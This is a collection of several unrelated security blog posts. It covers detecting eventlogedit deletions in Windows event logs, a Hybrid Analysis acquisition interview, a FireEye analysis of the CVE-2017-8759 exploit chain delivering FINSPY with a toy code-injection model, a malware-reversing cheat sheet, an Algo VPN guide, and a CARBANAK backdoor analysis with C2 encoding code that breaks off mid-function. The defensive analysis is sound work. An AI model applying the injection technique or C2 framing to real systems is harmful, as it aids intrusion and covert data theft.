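    magic, size, number, filetime = struct.unpack_from("<4sIQQ", buf, offset)
    if magic != RECORD_MAGIC:
        raise ValueError("not an event record")
    # The record's size is repeated in its last four bytes.
    (size_copy,) = struct.unpack_from("<I", buf, offset + size - 4)
    return {"size": size, "number": number,
            "timestamp": filetime, "size_copy": size_copy}
```

The duplicated size field at the end of each record is what makes the file walkable in both directions, and it plays a role in how eventlogedit's manipulation can be spotted.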

Fox-IT discovered that when eventlogedit is used, the to-be-removed event record itself isn’t edited or removed at all: the record is only unreferenced. This is achieved by manipulating the record header of the preceding record. Eventlogedit adds the size of the to-be-removed record to the size of the previous record, thereby merging the two records. The removed record, including its record header, is then simply seen as excess data of the preceding record. This is illustrated in Figure 3. You might expect an event viewer to show this excess or garbage data, but apparently all tested viewers parse the record’s binXml message data until the first end-tag and then move on to the next record. Tested viewers include Windows Event Viewer as well as various other forensic event log viewers and parsers; none of them was able to show a removed record.

Untouched event records (left) and deleted event record (right)

Figure 3: Untouched event records (left) and deleted event record (right). Note: not all fields are displayed here.

Merely changing the record size would not be enough to prevent detection: various fields in the file and chunk headers need to be changed as well. Eventlogedit makes sure that all following event record numbers are renumbered and that checksums are recalculated in both the file and chunk headers. Doing so, it ensures that obvious anomalies like missing record numbers or checksum errors are prevented and will not raise an alarm with the system user or the security department.

Organizations which send event log records on the fly to a central log server (e.g. a SIEM), should be able to see the removed record on their server. However, an advanced attacker will most likely compromise the log server before continuing the operation on the target computer.

Recovering removed records

As eventlogedit leaves the removed record and record header in its original state, their content can be recovered. This allows the full recovery of all the data that was originally in the record, including record number, event id, timestamps, and event message.
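The core of such a detection pass can be sketched in Python: walk the records by their declared sizes, and flag any record signature that turns up inside the span another record claims for itself. This is a toy version under the record layout described earlier, not the actual Fox-IT script (a real implementation must handle chunk headers and can false-positive on signature-like bytes inside event messages):

```python
import struct

RECORD_MAGIC = b"\x2a\x2a\x00\x00"  # event record signature
HEADER_LEN = 4 + 4 + 8 + 8          # signature, size, record number, timestamp

def make_record(number, payload):
    # Synthetic record for illustration: header, payload, size repeated at end.
    size = HEADER_LEN + len(payload) + 4
    return (RECORD_MAGIC + struct.pack("<IQQ", size, number, 0)
            + payload + struct.pack("<I", size))

def find_hidden_records(chunk):
    """Walk records by their declared sizes; a record signature found
    *inside* the span another record claims for itself marks an
    unreferenced (eventlogedit-style deleted) record."""
    hidden, offset = [], 0
    while chunk.startswith(RECORD_MAGIC, offset):
        (size,) = struct.unpack_from("<I", chunk, offset + 4)
        # Search the record's claimed span (past its own header) for
        # another record signature.
        inner = chunk.find(RECORD_MAGIC, offset + HEADER_LEN, offset + size)
        if inner != -1:
            hidden.append(inner)  # offset where the hidden record starts
        offset += size
    return hidden
```

Because the hidden record is untouched, its offset is all that is needed to re-parse it and recover the record number, timestamp, and event message.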

Fox-IT’s Forensics & Incident Response department has created a Python script that finds and exports any removed event log records from an event log file. The script also works in scenarios where consecutive event records have been removed, where the first record of the file is removed, or where the first record of a chunk is removed. An example is shown in Figure 4.

Recovering removed event records

Figure 4: Recovering removed event records

We have decided to open source the script. It can be found on our GitHub and works like this:

$ python -h
usage: [-h] -i INPUT_PATH [-o OUTPUT_PATH] [-e EXPORT_PATH]

Parse evtx files and detect the use of the danderspritz module that deletes
evtx entries

optional arguments:
  -h, --help      show this help message and exit
  -i INPUT_PATH   Path to evtx file
  -o OUTPUT_PATH  Path to corrected evtx file
  -e EXPORT_PATH  Path to location to store exported xml records

The script requires the python-evtx library from Willi Ballenthin.

Additionally, we have created an easy-to-use standalone executable for Windows systems, which can be found on our GitHub as well.


md5    c07f6a5b27e6db7b43a84c724a2f61be 
sha1   6d10d80cb8643d780d0f1fa84891a2447f34627c
sha256 6c0f3cd832871ba4eb0ac93e241811fd982f1804d8009d1e50af948858d75f6b



To detect whether the NSA or anyone else has used the eventlogedit tool to cover their tracks on your systems, it is recommended to run the script on event log files from your Windows servers and computers. As the NSA very likely changed their tools after the leaks, it might be far-fetched to expect to detect their current operations with this script, but you might find traces of it in older event log files. It is therefore also recommended to run the script on archived event log files from back-ups or central log servers.

If you find traces of eventlogedit and would like assistance with analysis and remediation of a possible breach, feel free to contact us: our Forensics & Incident Response department is available during business hours, and FoxCERT 24/7.

Wouter Jansen
Fox-IT Forensics & Incident Response

Hybrid Analysis Grows Up – Acquired by CrowdStrike

CrowdStrike acquired Payload Security, the company behind the automated malware analysis sandbox technology Hybrid Analysis, in November 2017. Jan Miller founded Payload Security approximately 3 years earlier. The interview I conducted with Jan in early 2015 captured his mindset at the onset of the journey that led to this milestone. I briefly spoke with Jan again, a few days after the acquisition. He reflected upon his progress over the three years of leading Payload Security so far and his plans for Hybrid Analysis as part of CrowdStrike.

Jan, why did you and your team decide to join CrowdStrike?

Developing a malware analysis product requires a constant stream of improvements to the technology, not only to keep up with the pace of malware authors’ attempts to evade automated analysis but also innovate and embrace the community. The team has accomplished a lot thus far, but joining CrowdStrike gives us the ability to access a lot more resources and grow the team to rapidly improve Hybrid Analysis in the competitive space that we live in. We will have the ability to bring more people into the team and also enhance and grow the infrastructure and integrations behind the free Hybrid Analysis community platform.

What role did the free version of your product play in the company’s evolution?

A lot of people in the community have been using the free version of Hybrid Analysis to analyze their own malware samples, share them with friends, or look up existing analysis reports and extract intelligence. Today, the site has approximately 44,000 active users and around 1 million sessions per month. One of the reasons the site took off is the simplicity and quality of the reports, which focus on what matters and enable effective incident response.

The success of Hybrid Analysis was, to a large extent, due to the engagement from the community. The samples we have been receiving allowed us to constantly field-test the system against the latest malware, stay on top of the game and also to embrace feedback from security professionals. This allowed us to keep improving at rapid pace in a competitive space, successfully.

What will happen to the free version of Hybrid Analysis? I saw on Twitter that your team pinky-promised to continue making it available for free to the community, but I was hoping you could comment further on this.

I’m personally committed to ensuring that the community platform will stay not only free, but grow even more useful and offer new capabilities shortly. Hybrid Analysis deserves to be the place for professionals to get a reasoned opinion about any binary they’ve encountered. We plan to open up the API, add more integrations and other free capabilities in the near future.

What stands out in your mind as you reflect upon your Hybrid Analysis journey so far? What’s motivating you to move forward?

Starting out without any noteworthy funding, co-founders or advisors, in a saturated, extremely fast-paced, high-tech market full of money, it seemed impossible on paper to succeed. But the reality is: if you are offering a product or service that solves a real-world problem considerably better than the market leaders, you always have a chance. My hope is that people who are considering becoming entrepreneurs will be encouraged to pursue their ideas. Be prepared to work 80 hours a week; but with the right technology, feedback from the community, amazing team members, and insightful advisors to lean on, you can make it happen.

In fact, it’s because of the value Hybrid Analysis has been adding to the community that I was able to attract the highly talented individuals that are currently on the team. It has always been important for me to make a difference, to contribute something and have a true impact on people’s lives. It all boils down to bringing more light than darkness into the world, as cheesy as that might sound.

FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY

FireEye recently detected a malicious Microsoft Office RTF document that leveraged CVE-2017-8759, a SOAP WSDL parser code injection vulnerability. This vulnerability allows a malicious actor to inject arbitrary code during the parsing of SOAP WSDL definition contents. FireEye analyzed a Microsoft Word document where attackers used the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands.

FireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch to address the vulnerability and security guidance, which can be found here.

FireEye email, endpoint and network products detected the malicious documents.

Vulnerability Used to Target Russian Speakers

The malicious document, “Проект.doc” (MD5: fe5c4d6bb78e170abf5cf3741868ea4c), might have been used to target a Russian speaker. Upon successful exploitation of CVE-2017-8759, the document downloads multiple components (details follow), and eventually launches a FINSPY payload (MD5: a7b990d5f57b244dd17e9a937a41e7f5).

FINSPY malware, also reported as FinFisher or WingBird, is available for purchase as part of a “lawful intercept” capability. Based on this and previous use of FINSPY, we assess with moderate confidence that this malicious document was used by a nation-state to target a Russian-speaking entity for cyber espionage purposes. Additional detections by FireEye’s Dynamic Threat Intelligence system indicate that related activity, though potentially for a different client, might have occurred as early as July 2017.

CVE-2017-8759 WSDL Parser Code Injection

A code injection vulnerability exists in the WSDL parser module, within the PrintClientProxy method (System.Runtime.Remoting/metadata/wsdlparser.cs, line 6111). The IsValidUrl method does not perform correct validation when the provided data contains a CRLF sequence. This allows an attacker to inject and execute arbitrary code. A portion of the vulnerable code is shown in Figure 1.

Figure 1: Vulnerable WSDL Parser

When multiple address definitions are provided in a SOAP response, the code inserts the “//base.ConfigureProxy(this.GetType(),” string after the first address, commenting out the remaining addresses. However, if a CRLF sequence is present in the additional addresses, the code following the CRLF will not be commented out. Figure 2 shows that, due to the lack of CRLF validation, a System.Diagnostics.Process.Start method call is injected. The generated code is compiled by csc.exe of the .NET Framework, and loaded by the Office executables as a DLL.

Figure 2: SOAP definition VS Generated code
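The mechanism can be modeled in a few lines of Python standing in for the vulnerable C# generator: extra addresses are neutralized by pasting them into a single-line “//” comment, so a CRLF embedded in an address starts a fresh, uncommented line. The function and payload below are hypothetical simplifications for illustration, not the actual wsdlparser.cs code:

```python
def generate_proxy_code(addresses):
    """Toy stand-in for the WSDL proxy generator: keep the first
    address, comment out the rest with '//' on a single line."""
    first, rest = addresses[0], addresses[1:]
    lines = ['this.Url = "%s";' % first]
    for addr in rest:
        # Vulnerable step: the address is pasted into a '//' comment
        # without checking for embedded CR/LF characters.
        lines.append("// extra address: %s" % addr)
    return "\n".join(lines)

benign = generate_proxy_code(["http://a/ws", "http://b/ws"])

# A CRLF sequence escapes the comment, so the injected statement lands
# on its own, uncommented line in the generated source.
evil = generate_proxy_code(
    ["http://a/ws", 'http://b/ws\r\nSystem.Diagnostics.Process.Start("calc");'])
```

In the real attack, the generated source is then compiled by csc.exe and loaded by Office, so the uncommented injected line executes.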

The In-the-Wild Attacks

The attacks that FireEye observed in the wild leveraged a Rich Text Format (RTF) document, similar to the CVE-2017-0199 documents we previously reported on. The malicious sample contained an embedded SOAP moniker to facilitate exploitation (Figure 3).

Figure 3: SOAP Moniker

The payload retrieves the malicious SOAP WSDL definition from an attacker-controlled server. The WSDL parser, implemented in the .NET Framework, parses the content and generates a .cs source code file in the working directory. The csc.exe compiler of the .NET Framework then compiles the generated source code into a library, namely http[url path].dll. Microsoft Office then loads the library, completing the exploitation stage. Figure 4 shows an example library loaded as a result of exploitation.

Figure 4: DLL loaded

Upon successful exploitation, the injected code creates a new process and leverages mshta.exe to retrieve an HTA script named “word.db” from the same server. The HTA script removes the source code, the compiled DLL and the PDB files from disk, and then downloads and executes the FINSPY malware named “left.jpg,” which, in spite of the .jpg extension and “image/jpeg” content-type, is actually an executable. Figure 5 shows the details of the PCAP of this malware transfer.

Figure 5: Live requests

The malware will be placed at %appdata%\Microsoft\Windows\OfficeUpdte-KB[ 6 random numbers ].exe. Figure 6 shows the process create chain under Process Monitor.

Figure 6: Process Created Chain

The Malware

The “left.jpg” (md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant of FINSPY. It leverages heavily obfuscated code that employs a built-in virtual machine – among other anti-analysis techniques – to make reversing more difficult. As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames. This variant runs with a mutex of "WininetStartupMutex0".


CVE-2017-8759 is the second zero-day vulnerability used to distribute FINSPY uncovered by FireEye in 2017. These exposures demonstrate the significant resources available to “lawful intercept” companies and their customers. Furthermore, FINSPY has been sold to multiple clients, suggesting the vulnerability was being used against other targets.

It is possible that CVE-2017-8759 was used by additional actors. While we have not found evidence of this, the zero-day used to distribute FINSPY in April 2017, CVE-2017-0199, was simultaneously being used by a financially motivated actor. If the actors behind FINSPY obtained this vulnerability from the same source used previously, it is possible that the source sold it to additional actors.


Thank you to Dhanesh Kizhakkinan, Joseph Reyes, FireEye Labs Team, FireEye FLARE Team and FireEye iSIGHT Intelligence for their contributions to this blog. We also thank everyone from the Microsoft Security Response Center (MSRC) who worked with us on this issue.

Tips for Reverse-Engineering Malicious Code

This cheat sheet outlines tips for reversing malicious Windows executables via static and dynamic code analysis with the help of a debugger and a disassembler. To print it, use the one-page PDF version; you can also edit the Word version to customize it for your own needs.

Overview of the Code Analysis Process

  1. Examine static properties of the Windows executable for initial assessment and triage.
  2. Identify strings and API calls that highlight the program’s suspicious or malicious capabilities.
  3. Perform automated and manual behavioral analysis to gather additional details.
  4. If relevant, supplement your understanding by using memory forensics techniques.
  5. Use a disassembler for static analysis to examine code that references risky strings and API calls.
  6. Use a debugger for dynamic analysis to examine how risky strings and API calls are used.
  7. If appropriate, unpack the code and its artifacts.
  8. As your understanding of the code increases, add comments and labels; rename functions and variables.
  9. Progress to examine the code that references or depends upon the code you’ve already analyzed.
  10. Repeat steps 5-9 above as necessary (the order may vary) until analysis objectives are met.

Common 32-Bit Registers and Uses

EAX Addition, multiplication, function results
ECX Counter; used by LOOP and others
EBP Baseline/frame pointer for referencing function arguments (EBP+value) and local variables (EBP-value)
ESP Points to the current “top” of the stack; changes via PUSH, POP, and others
EIP Instruction pointer; points to the next instruction; shellcode gets it via call/pop
EFLAGS Contains flags that store outcomes of computations (e.g., Zero and Carry flags)
FS F segment register; FS[0] points to SEH chain, FS[0x30] points to the PEB.

Common x86 Assembly Instructions

mov EAX,0xB8 Put the value 0xB8 in EAX.
push EAX Put EAX contents on the stack.
pop EAX Remove contents from top of the stack and put them in EAX.
lea EAX,[EBP-4] Put the address of variable EBP-4 in EAX.
call EAX Call the function whose address resides in the EAX register.
add esp,8 Increase ESP by 8 to shrink the stack by two 4-byte arguments.
sub esp,0x54 Shift ESP by 0x54 to make room on the stack for local variable(s).
xor EAX,EAX Set EAX contents to zero.
test EAX,EAX Check whether EAX contains zero, set the appropriate EFLAGS bits.
cmp EAX,0xB8 Compare EAX to 0xB8, set the appropriate EFLAGS bits.

Understanding 64-Bit Registers

  • Additional 64-bit registers are R8-R15.
  • RSP is often used to access stack arguments and local variables, instead of EBP.
  • |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||| R8 (64 bits)
    ________________________________|||||||||||||||||||||||||||||||| R8D (32 bits)
    ________________________________________________|||||||||||||||| R8W (16 bits)
    ________________________________________________________|||||||| R8B (8 bits)
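The diagram above amounts to masking off the low bytes of the full register; a quick sanity check with an arbitrary example value:

```python
R8 = 0x1122334455667788  # arbitrary 64-bit example value

# The narrower register names alias the low bytes of the same register:
R8D = R8 & 0xFFFFFFFF    # low 32 bits -> 0x55667788
R8W = R8 & 0xFFFF        # low 16 bits -> 0x7788
R8B = R8 & 0xFF          # low 8 bits  -> 0x88
```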

Passing Parameters to Functions

arg0 [EBP+8] on 32-bit, RCX on 64-bit
arg1 [EBP+0xC] on 32-bit, RDX on 64-bit
arg2 [EBP+0x10] on 32-bit, R8 on 64-bit
arg3 [EBP+0x14] on 32-bit, R9 on 64-bit

Decoding Conditional Jumps

JA / JG Jump if above/jump if greater.
JB / JL Jump if below/jump if less.
JE / JZ Jump if equal; same as jump if zero.
JNE / JNZ Jump if not equal; same as jump if not zero.
JGE / JNL Jump if greater or equal; same as jump if not less.

Some Risky Windows API Calls

  • Code injection: CreateRemoteThread, OpenProcess, VirtualAllocEx, WriteProcessMemory, EnumProcesses
  • Dynamic DLL loading: LoadLibrary, GetProcAddress
  • Memory scraping: CreateToolhelp32Snapshot, OpenProcess, ReadProcessMemory, EnumProcesses
  • Data stealing: GetClipboardData, GetWindowText
  • Keylogging: GetAsyncKeyState, SetWindowsHookEx
  • Embedded resources: FindResource, LockResource
  • Unpacking/self-injection: VirtualAlloc, VirtualProtect
  • Query artifacts: CreateMutex, CreateFile, FindWindow, GetModuleHandle, RegOpenKeyEx
  • Execute a program: WinExec, ShellExecute, CreateProcess
  • Web interactions: InternetOpen, HttpOpenRequest, HttpSendRequest, InternetReadFile
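During initial triage (steps 1 and 2 of the process above), a quick way to surface these names is a string scan over the raw binary. This is a minimal sketch only: a real pass would parse the PE import table, and the API list here is a small assumed subset of the categories above.

```python
# A small, assumed subset of the risky API names listed above.
RISKY_APIS = [
    b"CreateRemoteThread", b"WriteProcessMemory", b"LoadLibrary",
    b"GetProcAddress", b"SetWindowsHookEx", b"GetAsyncKeyState",
    b"VirtualAlloc", b"InternetOpen", b"CreateProcess",
]

def flag_risky_strings(data):
    """Return the risky API names present in a raw binary blob.
    Plain substring matching: cheap triage, not import-table parsing,
    so packed or obfuscated samples will evade it."""
    return sorted(name.decode() for name in RISKY_APIS if name in data)
```

For example, flag_risky_strings(open("sample.exe", "rb").read()) returns the matching names for a file on disk, pointing you at which categories above deserve closer static analysis.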

Additional Code Analysis Tips

  • Be patient but persistent; focus on small, manageable code areas and expand from there.
  • Use dynamic code analysis (debugging) for code that’s too difficult to understand statically.
  • Look at jumps and calls to assess how the specimen flows from one “interesting” code block to another.
  • If code analysis is taking too long, consider whether behavioral or memory analysis will achieve the goals.
  • When looking for API calls, know the official API names and the associated native APIs (Nt, Zw, Rtl).


Authored by Lenny Zeltser with feedback from Anuj Soni. Malicious code analysis and related topics are covered in the SANS Institute course FOR610: Reverse-Engineering Malware, which they’ve co-authored. This cheat sheet, version 1.0, is released under the Creative Commons v3 “Attribution” License.

How to Deploy Your Own Algo VPN Server in the DigitalOcean Cloud

When performing security research or connecting over untrusted networks, it’s often useful to tunnel connections through a VPN in a public cloud. This approach helps conceal your origin and safeguard your traffic, contributing to OPSEC when interacting with malicious infrastructure or traversing hostile environments. Moreover, by using VPN exit nodes in different cities and even countries, the researcher can explore the target from multiple geographic vantage points, which sometimes yields additional findings.

One way to accomplish this is to set up your own VPN server in a public cloud, as an alternative to relying on a commercial VPN service. The following tutorial explains how to deploy the Algo VPN software bundle on DigitalOcean (the link includes my referral code). I like using DigitalOcean for this purpose because it offers virtual private server instances for as little as $5 per month; also, I find it easier to use than AWS.

Algo VPN Overview

Algo VPN is an open source software bundle designed for self-hosted IPSec VPN services. It was designed by the folks at Trail of Bits to be easy to deploy, rely only on modern protocols and ciphers and provide reasonable security defaults. Also, it doesn’t require dedicated VPN client software for connecting from most systems and devices, because of native IPSec support.

To understand why its creators believe Algo VPN is a better alternative to commercial VPNs, the Streisand VPN bundle and OpenVPN, read the blog post that announced Algo’s initial release.  As outlined in the post, Algo VPN is meant “to be easy to set up. That way, you start it when you need it, and tear it down before anyone can figure out the service you’re routing your traffic through.”

Creating a DigitalOcean Virtual Private Server

To obtain an Internet-accessible system where you’ll install the Algo VPN server software, you can create a “droplet” on DigitalOcean running Ubuntu with a few clicks. To do that, click the dropdown button below the Ubuntu icon on the DigitalOcean “Create Droplets” page, then select the 18.04 option, as shown below. (Don’t use 16.04, due to a possible DNS issue.)

Accepting default options for the droplet should be OK in most cases. If you’re not planning to tunnel a lot of traffic through the system, selecting the least expensive size will probably suffice. Select the geographic region where the Virtual Private Server will run based on your requirements. Assign a hostname that appeals to you.

Once the new host is active, make a note of the public IP address that DigitalOcean assigns to it and log into it using SSH. Then run the following commands inside the new virtual private server to update its OS and install Algo VPN core prerequisites:

apt-add-repository -y ppa:ansible/ansible
apt-get update -y
apt-get upgrade -y
apt-get install -y build-essential \
  libssl-dev \
  libffi-dev \
  python-dev \
  python-pip \
  python-setuptools

At this point you could harden the configuration of the virtual private server, but these steps are outside the scope of this guide.

Installing Algo VPN Server Software

Next, obtain the latest Algo VPN server software on the newly-setup droplet and prepare for the installation by executing the following commands:

git clone
cd algo
python -m virtualenv env
source env/bin/activate
python -m pip install -U pip
python -m pip install -r requirements.txt

Set up usernames for the people who will be using the VPN. To accomplish this, use your favorite text editor, such as Nano or Vim, to edit the config.cfg file in the ~/algo directory:

vim config.cfg

Remove the lines that represent the default users “dan” and “jack” and add your own (e.g., “john”), so that the corresponding section of the file looks like this:

 - john

After saving the file and exiting the text editor, execute the following command in the ~/algo directory to install Algo software:

./algo
When prompted by the installer, select the option to install “to existing Ubuntu 16.04 server”. Note that you’ll be selecting “16.04” even though you’re actually installing Algo VPN on Ubuntu version 18.04.

When proceeding with the installer, you should be OK in most cases accepting the default answers, with a few exceptions:

  • When asked about the public IP address of the server, enter the IP address assigned to the virtual private server by DigitalOcean when you created the droplet.
  • If planning to VPN from Windows 10 or Linux desktop client systems, answer “Y” to the corresponding question.

After providing the answers, give the installer a few minutes to complete its tasks. (Be patient.) Once it finishes, you’ll see the “Congratulations!” message, stating that your Algo VPN server is running.

Be sure to capture the “p12 and SSH keys password for new users” that the installer will display at the end as part of the congratulatory message, because you will need to use it later. Store it in a safe place, such as your password vault.

Configuring VPN Clients

Once you’ve set up the Algo VPN service, follow the instructions on the Algo VPN website to configure your VPN client. The steps are different for each OS. Fortunately, the Algo setup process generates files that allow you to accomplish this with relative ease. It stores the files under ~/algo/configs in a subdirectory whose name matches your server’s IP address.

For instance, to configure your iOS device, transfer your user’s Apple Profile file that has the .mobileconfig extension (e.g., john.mobileconfig) to the device, then open the file to install it. Once this is done, you can go to Settings > VPN on your iOS device to enable the VPN when you wish to use it. If at some point you wish to delete this VPN profile, go to General > Profile.

If setting up the VPN client on Windows 10, retrieve from the Algo VPN server your user’s file with the .ps1 extension (e.g., windows_john.ps1). Then, open the Administrator shell on the Windows system and execute the following command from the folder where you’ve placed these files, adjusting the file name to match your name:

powershell -ExecutionPolicy ByPass -File windows_john.ps1 -Add

When prompted, supply the p12 password that the Algo VPN installer displayed at the end of the installation. This will import the appropriate certificate information and create the VPN connection entry. To connect to the VPN server, go to Settings > Network & Internet > VPN. If you wish to remove the VPN entry, use the PowerShell command above, replacing “-Add” with “-Remove”.

Additional Considerations for Algo VPN

Before relying on the VPN to safeguard your interactions with malicious infrastructure, be sure to confirm that it’s concealing the necessary aspects of your origin. If it’s working properly, the remote host should see the IP address of your VPN server instead of the IP address of your VPN client. Similarly, your DNS traffic should be directed through the VPN tunnel, concealing your client’s locally-configured DNS server. One way to validate this is to use an IP and DNS leak-checking service, comparing what information the site reveals before and after you activate your VPN connection. Also, confirm that you’re not leaking your origin over IPv6; one way to do that is by connecting to an IPv6 test site.

You can turn off the virtual private server when you don’t need it. When you boot it up again, Algo VPN software will automatically launch in the background. If running the server for longer periods of time, you should implement security measures appropriate for Internet-connected infrastructure.

As you use your Algo VPN server, adversaries might begin tracking the server’s IP address and eventually blacklist it. Therefore, it’s a good idea to periodically destroy this DigitalOcean droplet and create a new one from scratch. This will not only change the server’s IP address, but also ensure that you’re running the latest version of VPN software and its dependencies. Unfortunately, after you do this, you’ll need to reimport VPN client profiles to match the new server’s IP address and certificate details.

Behind the CARBANAK Backdoor

In this blog, we will take a closer look at the powerful, versatile backdoor known as CARBANAK (aka Anunak). Specifically, we will focus on the operational details of its use over the past few years, including its configuration, the minor variations observed from sample to sample, and its evolution. With these details, we will then draw some conclusions about the operators of CARBANAK. For additional background on the CARBANAK backdoor, see the reports by Kaspersky and by Group-IB and Fox-IT.

Technical Analysis

Before we dive into the meat of this blog, a brief technical analysis of the backdoor is necessary to provide some context. CARBANAK is a full-featured backdoor with data-stealing capabilities and a plugin architecture. Some of its capabilities include key logging, desktop video capture, VNC, HTTP form grabbing, file system management, file transfer, TCP tunneling, HTTP proxying, OS destruction, POS and Outlook data theft, and reverse shell. Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen, and some were added over time.

Monitoring Threads

The backdoor may optionally start one or more threads that perform continuous monitoring for various purposes, as described in Table 1.  

  • Key logger: Logs key strokes for configured processes and sends them to the command and control (C2) server
  • Form grabber: Monitors HTTP traffic for form data and sends it to the C2 server
  • POS monitor: Monitors for changes to logs stored in C:\NSB\Coalition\Logs and nsb.pos.client.log and sends parsed data to the C2 server
  • PST monitor: Searches recursively for newly created Outlook personal storage table (PST) files within user directories and sends them to the C2 server
  • HTTP proxy monitor: Monitors HTTP traffic for requests sent to HTTP proxies and saves the proxy address and credentials for future use

Table 1: Monitoring threads


In addition to its file management capabilities, this data-stealing backdoor supports 34 commands that can be received from the C2 server. After decryption, these 34 commands are plain text with parameters that are space delimited much like a command line. The command and parameter names are hashed before being compared by the binary, making it difficult to recover the original names of commands and parameters. Table 2 lists these commands.
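This hash-then-compare dispatch pattern can be sketched in Python. The hash routine, command names, and handlers below are stand-ins for illustration (CARBANAK’s actual hash algorithm and command set are not reproduced here); the point is that the binary stores only hash values, never the plain-text names:

```python
import zlib

def name_hash(name: str) -> int:
    # Stand-in for the backdoor's name-hashing routine; CRC32 is illustrative only.
    return zlib.crc32(name.encode())

# Dispatch table keyed by hash values, so the plain-text command names
# never need to appear in the binary.
HANDLERS = {
    name_hash("screenshot"): lambda args: "capturing screen",
    name_hash("sleep"): lambda args: "sleeping until " + args[0],
}

def dispatch(message: str) -> str:
    # Decrypted commands are plain text with space-delimited parameters,
    # much like a command line.
    parts = message.split(" ")
    handler = HANDLERS.get(name_hash(parts[0]))
    return handler(parts[1:]) if handler else "unknown command"
```

Recovering the original names from such a table requires guessing inputs that produce the stored hashes, which is what makes the commands difficult to name during analysis.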

  • Runs each command specified in the configuration file (see the Configuration section)
  • Updates the state value (see the Configuration section)
  • Desktop video recording
  • Downloads executable and injects it into a new process
  • Ammyy Admin tool
  • Updates self
  • Adds/updates klgconfig (analysis incomplete)
  • Starts HTTP proxy
  • Renders the computer unbootable by wiping the MBR
  • Reboots the operating system
  • Creates a network tunnel
  • Adds new C2 server or proxy address for the pseudo-HTTP protocol
  • Adds new C2 server for the custom binary protocol
  • Creates or deletes a Windows user account
  • Enables concurrent RDP (analysis incomplete)
  • Adds a Notification Package (analysis incomplete)
  • Deletes a file or service
  • Adds a command to the configuration file (see the Configuration section)
  • Downloads executable and injects it directly into a new process
  • Sends Windows account details to the C2 server
  • Takes a screenshot of the desktop and sends it to the C2 server
  • Sleeps until a specified date
  • Uploads files to the C2 server
  • Runs the VNC plugin
  • Runs a specified executable file
  • Uninstalls the backdoor
  • Returns a list of running processes to the C2 server
  • Changes the C2 protocol used by plugins
  • Downloads and executes shellcode from a specified address
  • Terminates the first process found with the specified name
  • Initiates a reverse shell to the C2 server
  • Plugin control
  • Updates the backdoor

Table 2: Supported Commands


A configuration file resides in a file under the backdoor’s installation directory with the .bin extension. It contains commands in the same form as those listed in Table 2 that are automatically executed by the backdoor when it is started. These commands are also executed when the loadconfig command is issued. This file can be likened to a startup script for the backdoor. The state command sets a global variable containing a series of Boolean values represented as ASCII values ‘0’ or ‘1’ and also adds itself to the configuration file. Some of these values indicate which C2 protocol to use, whether the backdoor has been installed, and whether the PST monitoring thread is running or not. Other than the state command, all commands in the configuration file are identified by their hash’s decimal value instead of their plain text name. Certain commands, when executed, add themselves to the configuration so they will persist across (or be part of) reboots. The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it.
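As a rough illustration of the state value’s layout, the following Python sketch parses a string of ASCII ‘0’/‘1’ flags into named Booleans. The field names and positions are hypothetical; only the encoding (one ASCII character per Boolean) comes from the analysis above:

```python
# Hypothetical flag layout; the real flag positions are not documented here.
STATE_FIELDS = ["use_binary_protocol", "installed", "pst_monitor_running"]

def parse_state(state: str) -> dict:
    """Turn a string like '101' into named Boolean flags."""
    return {name: ch == "1" for name, ch in zip(STATE_FIELDS, state)}

def serialize_state(flags: dict) -> str:
    """Inverse of parse_state, for writing the value back to the config file."""
    return "".join("1" if flags[n] else "0" for n in STATE_FIELDS)
```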

Figure 1 and Figure 2 illustrate some sample, decoded configuration files we have come across in our investigations.

Figure 1: Configuration file that adds new C2 server and forces the data-stealing backdoor to use it

Figure 2: Configuration file that adds TCP tunnels and records desktop video

Command and Control

CARBANAK communicates to its C2 servers via pseudo-HTTP or a custom binary protocol.

Pseudo-HTTP Protocol

Messages for the pseudo-HTTP protocol are delimited with the ‘|’ character. A message starts with a host ID composed by concatenating a hash value generated from the computer’s hostname and MAC address to a string likely used as a campaign code. Once the message has been formatted, it is sandwiched between an additional two fields of randomly generated strings of upper and lower case alphabet characters. An example of a command polling message and a response to the listprocess command are given in Figure 3 and Figure 4, respectively.

Figure 3: Example command polling message

Figure 4: Example command response message
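A minimal Python sketch of the message framing described above, before encryption: the host ID concatenates a hash of the hostname and MAC address with a campaign code, and the formatted message is sandwiched between two random alphabetic fields. The use of SHA-1, the field lengths, and the exact delimiter placement are assumptions for illustration:

```python
import hashlib
import random
import string

def host_id(hostname: str, mac: str, campaign_code: str) -> str:
    # SHA-1 truncated to 8 hex characters stands in for "a hash value
    # generated from the computer's hostname and MAC address".
    digest = hashlib.sha1((hostname + mac).encode()).hexdigest()[:8].upper()
    return digest + campaign_code

def rand_alpha(rng: random.Random, n: int) -> str:
    # Random string of upper- and lower-case alphabet characters.
    return "".join(rng.choice(string.ascii_letters) for _ in range(n))

def frame_message(hostname: str, mac: str, campaign_code: str,
                  body: str, rng: random.Random) -> str:
    # '|'-delimited message sandwiched between two random alpha fields.
    core = host_id(hostname, mac, campaign_code) + "|" + body
    return rand_alpha(rng, 8) + "|" + core + "|" + rand_alpha(rng, 8)
```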

Messages are encrypted using Microsoft’s implementation of RC2 in CBC mode with PKCS#5 padding. The encrypted message is then Base64 encoded, replacing all the ‘/’ and ‘+’ characters with the ‘.’ and ‘-’ characters, respectively. The eight-byte initialization vector (IV) is a randomly generated string consisting of upper and lower case alphabet characters. It is prepended to the encrypted and encoded message.

The encoded payload is then made to look like a URI by having a random number of ‘/’ characters inserted at random locations within the encoded payload. The malware then appends a script extension (php, bml, or cgi) with a random number of random parameters or a file extension from the following list with no parameters: gif, jpg, png, htm, html, php.

This URI is then used in a GET or POST request. The body of the POST request may contain files contained in the cabinet format. A sample GET request is shown in Figure 5.

Figure 5: Sample pseudo-HTTP beacon
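The encoding steps described above (minus the RC2 encryption and IV) can be sketched in Python. The slash-insertion counts and other particulars are illustrative:

```python
import base64
import random

def encode_payload(ciphertext: bytes) -> str:
    # Base64, with '/' -> '.' and '+' -> '-' as described above.
    # (RC2 encryption and the prepended IV are omitted from this sketch.)
    return base64.b64encode(ciphertext).decode().replace("/", ".").replace("+", "-")

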